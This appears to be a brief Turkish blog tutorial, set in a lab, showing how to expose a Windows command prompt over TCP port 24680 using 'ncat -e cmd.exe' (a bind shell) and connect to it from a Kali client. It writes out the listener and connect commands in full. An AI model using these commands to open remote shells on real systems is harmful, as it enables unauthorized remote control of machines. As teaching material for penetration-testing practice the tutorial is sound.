Ncat Aracı Kullanılarak Windows Sunucu Bilgisayarın Komut Satırına Doğrudan (Bind) Erişim Sağlanması

0
45
views
Ncat (netcat), komut satırından ağ üzerinde veri okuma / yazma işlemlerini gerçekleştirmeye yarayan bir araçtır. Bu aracın Linux ve Windows sürümleri bulunmaktadır. Bu yazıda, Windows bir bilgisayar sunucu olarak kullanılacak ve kendisine ağ üzerinden bağlantı kuran Linux istemci bilgisayarın Windows komut satırına doğrudan (bind connection) erişim elde edebildiği görülecektir.

Kali bilgisayarlarda ncat aracı varsayılan olarak bulunmaktadır. Bunun yanında, Windows bilgisayar için ncat aracı Nmap sayfasından (http://nmap.org/ncat/) indirilebilir.

Windows bilgisayarın komut satırının belirli bir porttan (TCP\24680) hizmete açılması aşağıdaki gibidir.

whoami
ncat.exe -lkvvnp 24680 -e cmd.exe

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-01

Kali istemci bilgisayarından Windows sunucu bilgisayarının (192.168.234.129) açılan portu üzerinden komut satırına erişim aşağıdaki gibidir. Erişim sağlandıktan sonra, Windows sunucunun komut satırındaymış gibi komutlar çalıştırılabilir.

ncat 192.168.234.131 24680
whoami

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-02

Böylece, Windows sunucu bilgisayarında doğrudan (bind) bir bağlantının oluştuğu ve “cmd.exe” komutunun çalıştığı görülmektedir.

acquiring-cmd-shell-on-windows-server-by-using-ncat-tool-03

 

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz